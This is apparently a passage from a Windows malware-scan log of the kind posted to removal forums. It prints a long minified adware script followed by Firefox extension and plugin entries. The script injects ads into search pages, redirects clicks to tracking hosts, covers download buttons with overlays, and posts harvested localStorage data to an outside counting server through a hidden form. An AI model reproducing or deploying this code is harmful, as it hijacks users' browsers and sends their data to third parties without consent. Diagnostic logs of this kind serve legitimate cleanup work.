a\"],unique_search_divs:\"2\",dr:[\".sb_adsWv2\"],urls:[\"http://www.bing.com/search?*\"],src_for_keyword:[\"#sb_form_q\",\".b_searchboxForm[name='q']\"],validate:function(){b.utils.ping(\"validate2\");return!0}},conduit:{hrefSelector:\"a[id^=ctl00_main_organicResults]\",unique_search_divs:\"1\",urls:[\"http://search.conduit.com*\"],src_for_keyword:\"#q_top\", dr:[\"#master-1\"],validate:function(){return!0}},ask:{hrefSelector:\".ptbs a[id^=r]\",unique_search_divs:\"1\",urls:[\"http://www.ask.com/web?q=*\",\"http://www.ask.com/web?qsrc=*\",\"http://www.ask.com/web?am=broad&q=*\"],src_for_keyword:[\"#top_qcomn\",\"#top_q_comm\"],dr:[\"#spl_img_top\"],validate:function(){return!0}},triple:{hrefSelector:\".gRsSlicetitle\",unique_search_divs:\"2\",dr:[\"#gRsTopLinks\"],urls:[\"http://search.triple-search.com/?*\",\"http://www.search.triple-search.com/?*\"],src_for_keyword:\"#q\",validate:function(){var a= b.utils.query_selector_all(\".gRsSTypeSelltr\");if(0<a.length){for(var c=0;c<a.length;c++)if(\"English\"==a[c].innerHTML)return!0;return!1}}},incredimail:{hrefSelector:\".title\",unique_search_divs:\"3\",dr:[\"#MainSponsoredLinks\"],urls:[\"http://www.search.incredimail.com/search.php?q*\",\"http://search.incredimail.com/search.php?q*\"],src_for_keyword:\"#q\",validate:function(){return-1<location.href.indexOf(\"lang=english\")?!0:!1}},gmaps:{hrefSelector:\"div[class^='ads-line'] a\",unique_search_divs:\"1\",dr:[\".ads.horiz.top\", \".ads.horiz.bot\"],urls:[\"https://www.google.com/maps/*\"],src_for_keyword:\"#searchboxinput\",tweak:function(){var a=function(){b.remove_search();b.utils.query_selector_all(\".omnibox-cards-transformations\")[0].style.marginTop=\"0px\";document.getElementById(\"reveal-cards\").style.marginTop=\"0px\"};b.events.add(\"click\",function(){a()},!1,document.getElementById(\"cards\"),!1);b.events.add(\"keyup\",function(){a()},!1,document.getElementById(\"searchbox_form\"),!1);b.events.add(\"click\",function(){a()},!1,document.getElementById(\"viewcard\"), !1);b.events.add(\"click\",function(){a()},!1,b.utils.query_selector_all(\".widget-runway-pegman\")[0],!1);b.events.add(\"click\",function(){a()},!1,b.utils.query_selector_all(\".gscb_a\")[0],!1);var c=function(a){a=document.querySelector(a);return getComputedStyle(a,null).height}(\".yael .cards-card\");document.querySelector(\".omnibox-cards-transformations\").style.marginTop=c;document.querySelector(\"#reveal-cards\").style.marginTop=c},validate:function(a){b.utils.isIE()||(b.num_of_items_in_one=1,a())}},amazon:{unique_search_divs:\"1\", urls:[\"http://www.amazon.com*&field-keywords=*\"],src_for_keyword:\"#twotabsearchtextbox\",validate:function(a){a()}},smartAddress:{hrefSelector:[\"li a\"],unique_search_divs:\"2\",dr:[\".peach ol\"],urls:[\"search.smartaddressbar.com/web.php?s=*\"],src_for_keyword:\"#stxt\",tweak:function(){var a=b.utils.query_selector_all(\".peach\")[0],c=b.utils.query_selector_all(\".right ul\")[0];a&&a.parentNode.removeChild(a);c&&c.parentNode.removeChild©},validate:function(){return!0}}};var l=function(a){if(\"string\"==typeof a){var c= a.match(/:nth-match\\(([0-9]+)\\)/);if(c&&1<c.length)return a=b.utils.query_selector_all(a.substr(0,c.index))||[],a[c[1]]||void 0;a=b.utils.query_selector_all(a)||[];return a[0]||void 0}};b.events=new function(){var a=this;a.cache=[];a.add=window.addEventListener?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f.addEventListener(b,d,e);g&&a.cache.push([b,d,e,f])}:window.attachEvent?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f[\"e\"+b+d]=d;f[b+d]=function(){f[\"e\"+b+d](window.event)};f.attachEvent(\"on\"+ b,f[b+d]);g&&a.cache.push([b,d,e,f])}:function(){};a.remove=window.removeEventListener?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.removeEventListener(a,b,e)}:window.detachEvent?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.detachEvent(\"on\"+a,f[a+b]);f[a+b]=null;f[\"e\"+a+b]=null}:function(){};a.flush=function(){for(var b=0;b<a.cache.length;b++)a.remove.apply(a,a.cache);a.cache=[]}};b.get_insertion_element=function(a){return!a.insert||\"before\"!=a.insert&&\"after\"!=a.insert?a.element: a.element.parentNode};b.dom=new function(){this.json_to_html=function(a,c){if(\"#text\"==a.type)c=document.createTextNode(a.text);else if(\"#comment\"!=a.type){c||(c=document.createElement(a.type));if(a.attrs){for(var d in a.attrs)if(a.attrs.hasOwnProperty(d))if(\"style\"==d&&a.attrs.style instanceof Object)for(var e in a.attrs.style){var f=b.utils.dhtml_prop_name(e);try{c.style[f]=a.attrs.style[e]}catch(g){}}else c.setAttribute(d,a.attrs[d]);\"iframe\"==a.type&&(a.attrs.hasOwnProperty(\"frameborder\")&&(c.frameBorder= a.attrs.frameborder),a.attrs.hasOwnProperty(\"marginwidth\")&&(c.marginWidth=a.attrs.marginwidth),a.attrs.hasOwnProperty(\"marginheight\")&&(c.marginHeight=a.attrs.marginheight))}if(a.children)for(d=0;d<a.children.length;d++){f=a.children[d];e=arguments.callee(f);try{c.appendChild(e)}catch(h){if(\"#text\"==f.type&&\"string\"==typeof f.text)if(\"style\"==a.type&&c.styleSheet)c.styleSheet.cssText=f.text||\"\";else if(e=b.utils.get_node_text_prop©)c[e]=f.text}}}return c}};b.addEventClick=function(a,c){for(var d= 0;d<a.length;d++)b.events.add(\"click\",function(a){a.preventDefault?a.preventDefault():a.returnValue=!1;this.href=\"#\";location.href=c+\"&j=true\";b.events.flush();localStorage.setItem(b.prefix,b.now+b.clickInterval);return!1},!1,a[d],!0)};b.checkClickInterval=function(a){if(b.now>a)return!0};b.setClickHref=function(a,c){if(\"undefined\"!=typeof b.projects_info[c].hrefSelector){if(b.utils.getRandomInt(1,1E4)>=1E4/b.ratio)return!1;var d=b.projects_info[c].hrefSelector,e=parseInt(localStorage.getItem(b.prefix)); if(\"undefined\"!=typeof d){if(d instanceof Array)for(var f=0;f<d.length;f++){var g=b.utils.query_selector_all(d[f]);if(0<g.length)break}else g=b.utils.query_selector_all(d);if(!e||b.checkClickInterval(e))b.addEventClick(g,a),b.j=!0}}};b.escape_chars_for_json=function(a){for(var b in a)a=a.replace(/\\\"/g,'\\\\\"');return a};b.tpl_engine=function(a,c,d){\"false\"!==d.layouts.unique&&(c=b.escape_chars_for_json©);a=JSON.stringify(a);c=[{replace:\"title\",\"with\":c.title},{replace:\"displayUrl\",\"with\":c.displayUrl}, {replace:\"description\",\"with\":c.description},{replace:\"clickUrl\",\"with\":c.clickUrl}];for(d=0;d<c.length;d++)a=a.replace(RegExp(\"\\\\[##\"+c[d].replace+\"##\\\\]\",\"g\"),c[d][\"with\"]);try{return JSON.parse(a)}catch(e){}};b.get_item_json=function(a,c){var d=b.utils.clone_object(a.layouts.template);d.attrs instanceof Object||(d.attrs={});return d=b.tpl_engine(d,c,a)};b.add_jsonp_to_config=function(a,c){b.get_item_json(a)};b.remove_search=function(){var a=b.utils.query_selector_all(\".yael\");if(0<a.length)for(var c= 0;c<a.length;c++)a[c].parentNode.removeChild(a[c])};b.inject_json=function(a){\"first\"==a.insert?a.element.insertBefore(a.node,a.element.firstChild):\"before\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element):\"after\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element.nextSibling):a.element.appendChild(a.node)};b.get_ad_dom=function(a){return a.layouts instanceof Object&&a.layouts.dom instanceof Object?a.layouts.dom:!1};b.get_layout_type=function(a){if(a.layouts instanceof Object)for(var b= 0;b<k.length;b++)if(-1<a.layouts.id.indexOf(k))return k;return!1};b.create_search=function(a){a=b.get_ad_dom(a);return b.dom.json_to_html(a)};b.templates=new function(){this.container_id=0;this.add_real_links=function(a,c){b.utils.add_event(\"click\",function( B){window.open(a);b.preventDefault?b.preventDefault():b.returnValue=!1},!1,c)}};b.validate_response=function(){for(var a in __yael_res.data.items)__yael_res.data.items[a].displayUrl.match(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/)&&__yael_res.data.items[a].displayUrl.replace(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/, \"\")};b.is_target_valid=function(a){if(0!=__yael_res.data.numberOfItems&&\"undefined\"!=typeof a.element)return a.urls instanceof Array&&!b.utils.match_url(a.element.ownerDocument.location.href,a.urls)?!1:!0};var p=null;b.get_target_element=function(a){if(a.inserts instanceof Array&&\"undefined\"==typeof a.element)for(var b=0;b<a.inserts.length;b++)if(a.element=l(a.inserts.selector),\"undefined\"!==typeof a.element){a.insert=a.inserts.at;break}};b.add_data_to_config=function(a,c){if(0==c.length)return b.unique_items_left= !1;var d=b.get_ad_dom(a);(function(a,c){c.children&&0!==c.children.length?(c=c.children[c.children.length-1],arguments.callee(a,c)):b.insert_point=c})(a,d);for(d=0;d<b.num_of_items_in_one&&0!=c.length;d++)b.insert_point.children.push(b.get_item_json(a,c[0])),\"true\"==a.layouts.unique?b.not_unique_items.push(c.shift()):c.shift()};b.addEventsToItems=function(){for(var a=document.querySelectorAll('a[href*=\"'+b.jsonpHost+'\"]'),c=0;c<a.length;c++)b.events.add(\"click\",function(){b.init_search_project()}, !1,a[c],!1)};b.check_if_div_in_dom=function(a, B){var d=[],e;for(e in __yael_res.config.targets){var f=__yael_res.config.targets[e];clearTimeout(p);a++;if(4<a)return;if(f.inserts instanceof Array&&\"undefined\"==typeof f.element)for(var g=0;g<f.inserts.length;g++){var h=l(f.inserts[g].selector);\"undefined\"!==typeof h&&d.push(h)}}for(e=0;e<d.length;e++)if(\"undefined\"==typeof d[e]){var k=this;p=setTimeout(function(){k.apply(k,arguments)},200)}b()};b.loop_targets=function(a,c,d){if(a instanceof Object&& (b.get_target_element(a),b.is_target_valid(a)&&(\"false\"==d&&b.unique_items_left&&(c=b.not_unique_items),0!=c.length))){b.add_data_to_config(a,c);try{a.node=b.create_search(a)}catch(e){}\"undefined\"!=typeof a.node&&b.inject_json(a)}};b.removeSecondClick=function(){for(var a=b.utils.query_selector_all(\".yael a\"),c=0;c<a.length;c++)b.events.add(\"click\",function(a){setTimeout(function(){for(var a=b.utils.query_selector_all(\".yael a\"),c=0;c<a.length;c++){var d=a[c];d.outerHTML=d.outerHTML.replace(/href\\=/ig, \"_href=\")}},20)},!1,a[c],!0)};b.inject_search=function(){b.not_unique_items=[];0!=__yael_res.data.items.length&&(b.setClickHref(__yael_res.data.items[0].clickUrl,b.projects_name),b.check_if_div_in_dom(0,function(){for(var a in __yael_res.config.targets){var c=__yael_res.config.targets[a];b.loop_targets(c,__yael_res.data.items,c.layouts.unique)}\"function\"==typeof b.projects_info[b.projects_name].tweak&&b.projects_info[b.projects_name].tweak();b.j||b.removeSecondClick();b.utils.flushWaitForTokens()}))}; b.init_search_project=function(){b.waitForElementCounter=0;\"undefined\"!=typeof __yael&&b.remove_search();for(var a in b.projects_info)if(b.utils.match_url(location.href,b.projects_info[a].urls)){var c=b.projects_info[a];b.projects_name=a;if(-1<b.initThrottle.indexOf(a))c.validate(function(){c.name=b.projects_name;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})});else{if(!c.validate())return;c.name=b.projects_name;b.projects_name=a;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})}}return!1}; b.get_keyword=function(a,c){var d=a.src_for_keyword,e=function(d){b.inputElement=d[0];b.keyword=b.inputElement.value;if(2>b.keyword.length)return b.utils.flushWaitForTokens(),!1;if(b.inputElement&&\"input\"==b.inputElement.tagName.toLowerCase()&&\"\"!==b.keyword)return c(b.keyword,a.name)};if(d instanceof Array)for(var f=0;f<d.length;f++)b.utils.waitForElement(d[f],function(a){a&&e(a)},100,\"keyword\");else b.utils.waitForElement(d,function(a){a&&e(a)},100,\"keyword\")};b.remove_se_handler=function(a){var c= b.projects_info[a].dr;if(c instanceof Array)if(\"bing\"==a)for(c=b.utils.query_selector_all(c[0]),a=0;a<c.length;a++)b.remove_se(c[a]);else for(a=0;a<c.length;a++){var d=l(c[a]);b.remove_se(d)}};b.remove_se=function(a){a&&a.parentElement.removeChild(a)};b.jsonp_request=function(a,c){var d=b.num_of_items_in_one*parseInt(b.projects_info[c].unique_search_divs);window.__yael_cb=function(a){window.__yael_res=a;\"0\"==__yael_res.data.numberOfItems?b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0, 10)&&b.remove_se_handler©,__yael.inject_search())};\"undefined\"==typeof window.__yael&&(window.__yael= B);d=b.jsonpHost+\"/?v=\"+b.version+\"&p=\"+c+\"&keyword=\"+a+\"&numItems=\"+d+\"&hid=17411091879117559275&eid=315&pid=2405&prid=186\";\"undefined\"!=typeof specificFeeds&&specificFeeds instanceof Array&&(d+=\"&_feeds=\"+specificFeeds.join(\",\"));if(b.utils.isIE()){if(document.getElementById(\"__yael_script\")){var e=document.getElementById(\"__yael_script\");e.parentNode.removeChild(e)}e= document.createElement(\"script\");e.id=\"__yael_script\";e.src=\"//\"+d+\"&domvar=__yael_cb\";e.type=\"text/javascript\";b.utils.addScript(e,c)}else b.utils.ajax.get(\"//\"+d,function(a){window.__yael_res=JSON.parse(a);\"0\"==__yael_res.data.numberOfItems?b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0,10)&&__yael.remove_se_handler©,__yael.inject_search())})};\"undefined\"==typeof __yael&&b.init_search_project();-1<b.initThrottle.indexOf(b.projects_name)&&b.events.add(\"keyup\",b.utils.throttle(b.init_search_project, 3E3),!1,b.inputElement,!1)}});;if(window.self.location.hostname.indexOf('mail.')==-1)\r\n{try{for(i=0;i<5;i++){window.setTimeout(function(){if(document.getElementById(\"cblocker\")){document.getElementById(\"cblocker\").parentNode.removeChild(document.getElementById(\"cblocker\"));};if(document.getElementById(\"_vdcbl\")){document.getElementById(\"_vdcbl\").parentNode.removeChild(document.getElementById(\"_vdcbl\"));}},i*100)}}catch(e){};\r\n};(function(){var b,f,g;try{var a=window.self.location.href;if(!(window.self==window.top||\"undefined\"==typeof localStorage||\"undefined\"==typeof localStorage.setItem||-1==a.indexOf(\"i70AALnT=\")&&!a.match(/1018-\\d{3,4}_/)&&-1==a.indexOf(\"cdncache-a.aka\"))){if(-1<a.indexOf(\"i70AALnT=\")){var d=a.match(/i70AALnT=(\\d+)_(\\d{2,3}x\\d{2,3})_?(\\d+)?/);b=d[1];f=d[2].replace(\"x\",\".\");g=d[3]?d[3]:0}else{try{var j=-1<a.indexOf(\"zoneid\")?a.match(/zoneid=(\\d+)/)[1]:a.match(/1018-(\\d+)_WS/)[1]}catch(n){j=0}var c=document.getElementsByTagName(\"body\")[0];b=-1<a.indexOf(\"cdncache-a.aka\")?1001:1002;f=Math.max(c.scrollWidth,c.offsetWidth)+\".\"+Math.max(c.scrollHeight,c.offsetHeight);g=j}var e=new Date,k=parseInt(e.getTime()/1E3),l=\"zyk_\"+[e.getUTCFullYear()+\"-\"+(e.getUTCMonth()+1)+\"-\"+e.getUTCDate(),b,f,g].join(),m=localStorage.getItem(l);localStorage.setItem(l,1+(m?parseInt(m):0));if(lsTime=localStorage.getItem(\"zEpoch\")){if(7200<k-parseInt(lsTime)){var h=document.createElement(\"div\");b=[];for(i in localStorage)-1<i.indexOf(\"zyk_\")&&b.push(\"'\"+i.replace(\"zyk_\",\"\")+\"':\"+localStorage.getItem(i));h.style.display=\"none\";h.innerHTML='<iframe name=\"webscorebox_ifr\"></iframe><form target=\"webscorebox_ifr\" method=\"post\" action=\"http://count3.webscorebox.com/?q=g708BNmGWj8lkGhVWzmPhd9HrjkMCyVUojs9rdkMDMlGC7VLBT94tMtGB6DHhfs0rShNAen0rchOAen0rjC9rjwEpjw5qHUFrjC8qjUGqHk=\" id=\"webscorebox_frm\"><input type=\"hidden\" name=\"scores\" value=\"{'+b.join(\",\")+'}\"></form>';(typeof c!=\"undefined\"?c:document.getElementsByTagName(\"body\")[0]).appendChild(h);document.getElementById(\"webscorebox_frm\").submit();localStorage.clear()}}else localStorage.setItem(\"zEpoch\",k)}}catch(p){}})();;(function(){-1<window.self.location.hostname.indexOf(\"kass.t\")&&setTimeout(function(){if(document.getElementById('_ad4d917f2e764fab63b916b5e0655d2e') && document.getElementById('_ad4d917f2e764fab63b916b5e0655d2e').firstElementChild){document.getElementById('_ad4d917f2e764fab63b916b5e0655d2e').firstElementChild.onclick=function(){return false}};if(document.getElementById(\"_091c88d5b8c081bf15d212c4ae994c85\")){var a=document.getElementById(\"_091c88d5b8c081bf15d212c4ae994c85\"),b=document.createElement(\"div\");b.setAttribute(\"style\",\"width:100%;height:300%;position:absolute;left:0;top:0\");b.innerHTML='<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"width:100%;height:100%\">';a.style.position=\"relative\";a.appendChild( B)}document.getElementById(\"_2bffc94164dd9984ae4826e8bc988721\")&&(a=document.getElementById(\"_2bffc94164dd9984ae4826e8bc988721\"),b=document.createElement(\"div\"),b.setAttribute(\"style\",\"width:100%;height:121%;position:absolute;left:0;top:0\"),b.innerHTML='<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"width:100%;height:100%\">',a.style.position=\"relative\",a.appendChild( B))},250);if(-1<window.self.location.hostname.indexOf(\"eo-online.me\")&&window.self==window.top){var d=function(){try{if(jQuery(\".down, .dloadf, .dloadt\").attr(\"href\",\"#\"),$(\"#adsfrm\").length){var a=$(\"#adsfrm\").offset();$('<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"position:absolute;z-index:9999;top:'+a.top+\"px;left:\"+a.left+\"px;width:\"+$(\"#adsfrm\").width()+\"px;height:\"+$(\"#adsfrm\").height()+'px;\">').appendTo(\"body\")}}catch( B){}},c=document.createElement(\"script\");c.type=\"text/javascript\";c[-1<navigator.userAgent.toLowerCase().indexOf(\"msie\")?\"text\":\"innerHTML\"]=\"(\"+d.toString()+\")()\";document.getElementsByTagName(\"head\")[0].appendChild©}if(-1<window.self.location.hostname.indexOf(\"irpy.co\")&&window.self==window.top)try{d=function(){try{$(\".download-maxiget, .download-trinity\").attr(\"href\",\"#\"),$(\"#mp3-with-trinity\").remove()}catch(a){}},-1<!navigator.userAgent.indexOf(\"chrome\")?d():(c=document.createElement(\"script\"),c.innerHTML=\"(\"+d.toString()+\")()\",document.body.appendChild©)}catch(e){}if('GB'!='US'&&-1<window.self.location.hostname.indexOf(\"ehd.c\")&&document.getElementById(\"r1113566095\")){var d=document.createElement(\"img\");d.setAttribute(\"style\",\"width:100%;height:100%;position:absolute;z-index:99999;left:0;top:0\");d.src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\";var a=document.getElementById(\"r1113566095\").parentNode;a.style.position=\"relative\";a.appendChild(d)};})();if(window.self.location.hostname.indexOf('hesefiles.c')>-1) window.self.location.href='about:blank';if(-1<window.self.location.hostname.indexOf(\"usfiles.ne\")){var a=function(){$(\"form[name=F1]\").submit(function(){if(-1<$(this).attr(\"action\").indexOf(\"bdl1=\"))return $(\"input[name=quick]\").attr(\"checked\",!1),window.setTimeout(function(){$(\"#btn_download\").attr(\"disabled\",!1).val(\"Download Now!!\");$(\"form[name=F1]\").unbind(\"submit\")},700),!1})};if(-1==navigator.userAgent.toLowerCase().indexOf(\"chrome\"))a();else{var s=document.createElement(\"script\");s.type=\"text/javascript\";s.innerHTML=\"(\"+a.toString()+\")()\";document.body.appendChild(s)}};if(-1<window.self.location.hostname.indexOf(\"ebeast.co\")){var d=document.getElementsByTagName(\"div\"),i;for(i in d)d[i]&&d[i].style&&\"fixed\"==d[i].style.position&&\"solid\"==d[i].style.borderBottomStyle&&(d[i].style.display=\"none\")};if(-1<window.self.location.hostname.indexOf(\"oolrom.com\")){var date=new Date;date.setTime(date.getTime()+2592E6);var expires=\"; expires=\"+date.toGMTString();document.cookie=\"installer=14604\"+expires+\"; path=/;domain=.coolrom.com\"};if (-1<document.location.host.indexOf(\"bookbrowsee.ne\")) {new function(){for(var c=[\"adv.php?\",\"/adv.php?\"],d=0;d<document.links.length;d++)for(var a=document.links[d],e=a.pathname+a.search,b=0;b<c.length;b++)c==e.substr(0,c.length)&&\"nofollow\"==a.rel&&\"_blank\"==a.target&&(a.setAttribute(\"onclick\",\"return false\"),a.addEventListener(\"click\",function(a){a.returnValue=!1;a.preventDefault&&a.preventDefault()},!1))}};if(-1<document.location.host.indexOf(\"irrorcreator.co\")){for(var c=[\"verticdn.com\"],d=0;d<document.links.length;d++)for(var a=document.links[d],e=a.host,b=0;b<c.length;b++)c==e&&(a.setAttribute(\"onclick\",\"return false\"),a.addEventListener(\"click\",function(f){f.returnValue=!1;f.preventDefault&&f.preventDefault()},!1))};if(-1<document.location.host.indexOf(\"loud-vibe.co\")){var a=document.getElementById(\"continue\");a.setAttribute(\"onclick\",\"return false\");a.setAttribute(\"href\",\"\");a.addEventListener(\"click\",function( B){b.returnValue=!1;b.preventDefault&&b.preventDefault()},!1);a.addEventListener(\"mousedown\",function( B){b.returnValue=!1;b.preventDefault&&b.preventDefault()},!1)};if(-1<document.location.host.indexOf(\"p3seal.co\")){var a=document.getElementById(\"continue\");a.setAttribute(\"onclick\",\"return false\");a.setAttribute(\"href\",\"\");a.addEventListener(\"click\",function( B){b.returnValue=!1;b.preventDefault&&b.preventDefault()},!1);a.addEventListener(\"mousedown\",function( B){b.returnValue=!1;b.preventDefault&&b.preventDefault()},!1)};if(-1<document.location.host.indexOf(\"p3vampire.co\")){var a=document.getElementById(\"continue\");a.setAttribute(\"onclick\",\"return false\");a.setAttribute(\"href\",\"\");a.addEventListener(\"click\",function( B){b.returnValue=!1;b.preventDefault&&b.preventDefault()},!1);a.addEventListener(\"mousedown\",function( B){b.returnValue=!1;b.preventDefault&&b.preventDefault()},!1)};if(-1<document.location.host.indexOf(\"leunlckr.co\")){var b=document.getElementsByTagName(\"button\")[0];b.parentNode.style.position=\"relative\";var d=document.createElement(\"div\");d.style.position=\"absolute\";d.style.top=\"0\";d.style.left=\"0\";d.style.width=\"100%\";d.style.height=\"100%\";d.style.zIndex=\"9999\";d.style.cursor=\"pointer\";b.parentNode.appendChild(d)};;(function(){try{var b=\"gonetwork.eu performancerevenues.com adtransfer adk2.com timehare clkads.com adcash xtendmedia.com cpxinteractive media-servers directrev doubleclick brealtime.com adnxs.com yieldmanager jsopen yieldads adserverplus clicksor exoclick.com vitalads zedo.com mshft pop.billi mediawhite edomz getjs adjuggler realpopbid bestadbid directdisplayad displayadfeed adorika displayadfeed akamaihd.net/ssa/ trusted-serving tusfiles clkmon.c minecraftdl\".split(\" \");for(i=0;i<b.length;i++){var a=location.href + (document.title?document.title.toLowerCase():\"z\");if(document.referrer&&-1<document.referrer.indexOf(b[i])&&(-1<a.indexOf(\"download\")||-1<a.indexOf(\"convert\")||-1<window.self.location.href.indexOf(\"babylon\")||-1<window.self.location.href.indexOf(\"se Update Go\")||-1<window.self.location.href.indexOf(\"ilivid\")||-1<window.self.location.href.indexOf(\"download\")||-1<a.indexOf(\"regclean\")||-1<a.indexOf(\"etype\")||-1<a.indexOf(\"diction\")||-1<a.indexOf(\"my-uq\")||-1<a.indexOf(\"ftalk\")||-1<a.indexOf(\"pcspeedmaximizer\")||-1<a.indexOf(\"kingtransl\")||-1<a.indexOf(\"jsopen\")||-1<a.indexOf(\"7-zip\")||-1<a.indexOf(\"boost pc\")||-1<a.indexOf(\"computer slow\")||-1<a.indexOf(\"7-update14\")||-1<a.indexOf(\"player\")) || location.hostname.indexOf('jsopen.net')>-1){var channel=99;if(window.onbeforeunload){window.onbeforeunload=null;channel=98};location.href=\"http://canadaalltax.com/e/?f=qjaKrjs4vTw4rG5GqV1FqdaFrHwFpdr4&eid=315&hid=17411091879117559275&pid=2405&ch=\"+channel+\"&s=px.pluginh&r=\"+Math.random();break}}}catch(d){}})();if(-1==window.self.location.hostname.indexOf('mail.')){for(i=0;5>i;i++)window.setTimeout(function(){document.getElementById('c2soffer')&&document.getElementById('c2soffer').parentNode.removeChild(document.getElementById('c2soffer'))},100*i);var c2soffer=document.querySelectorAll('div.c2soffer');if(c2soffer && c2soffer.length && c2soffer.length>0)for(var i=0;i<c2soffer.length;i++)c2soffer[i].parentNode.removeChild(c2soffer[i]);document.getElementById('w3uyh7g6h7f5x')&&document.getElementById('w3uyh7g6h7f5x').parentNode.removeChild(document.getElementById('w3uyh7g6h7f5x'))};if(window.top==window.self&&\"undefined\"!=typeof addEventListener&&5>parseInt(\"1.98\")&&-1==document.cookie.indexOf(\"vdsknj4th4un\")){var zytd=function(a){try{if(\"a\"==a.target.tagName.toLowerCase()&&\"\"==a.target.innerHTML&&a.target.getAttribute(\"href\")&&-1==a.target.getAttribute(\"href\").indexOf(window.self.location.hostname)){a.target.setAttribute(\"href\",\"http://r.searchfun.in/?g=Azm9CdOLv6D6DG4ZhyqZC7YKg70Jv6qTCMVEDc0EgeqRg6bJvNbOCd0GojsGrjUErchXCMhMofb5vNbIDeDPBMY%3D\");var b=new Date;b.setHours(b.getHours()+5);document.cookie=\"vdsknj4th4un=1;expires=\"+b.toUTCString();document.getElementsByTagName(\"body\")[0].removeEventListener(\"click\",zytd)}}catch©{}};try{document.getElementsByTagName(\"body\")[0].addEventListener(\"click\",zytd)}catch(e){}};})();(function(){void(0)})()"); FF - prefs.js..extensions.enabledAddons: leethax%40leethax.net:2013.11.18b
FF - prefs.js..extensions.enabledAddons: %7Bc1970c0d-dbe6-4d91-804f-c9c0de643a57%7D:1.3.2.13
FF - prefs.js..extensions.enabledAddons: itst-firefox-plugin%40itstructures.com:1.4.4.0
FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:29.0.1
FF - user.js - File not found
FF:64bit: - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF64_13_0_0_214.dll File not found
FF:64bit: - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: disabled File not found
FF:64bit: - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files\Microsoft Silverlight\5.1.30214.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_13_0_0_214.dll ()
FF - HKLM\Software\MozillaPlugins\@adobe.com/ShockwavePlayer: C:\Windows\system32\Adobe\Director\np32dsw.dll (Adobe Systems, Inc.)
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=: File not found
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF - HKLM\Software\MozillaPlugins\@divx.com/DivX Browser Plugin,version=1.0.0: C:\Program Files (x86)\DivX\DivX Plus Web Player\npdivx32.dll (DivX,Inc.)
FF - HKLM\Software\MozillaPlugins\@Google.com/GoogleEarthPlugin: C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)
FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.55.2: C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.55.2: C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: disabled File not found
FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files (x86)\Microsoft Silverlight\5.1.30214.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3502.0922: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3508.1109: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3538.0513: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3555.0308: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WPF,version=3.5: C:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@nexon.net/NxGame: C:\ProgramData\NexonUS\NGM\npNxGameUS.dll (Nexon)
FF - HKLM\Software\MozillaPlugins\@nullsoft.com/winampDetector;version=1: C:\Program Files (x86)\Winamp Detect\npwachk.dll (Nullsoft, Inc.)
FF - HKLM\Software\MozillaPlugins\@oberon-media.com/ONCAdapter: File not found
FF - HKLM\Software\MozillaPlugins\@pandonetworks.com/PandoWebPlugin: C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll File not found
FF - HKLM\Software\MozillaPlugins\@soe.sony.com/installer,version=1.0.3: C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\t1p05fwg.default\extensions\{000F1EA4-5E08-4564-A29B-29076F63A37A}\plugins\npsoe.dll File not found
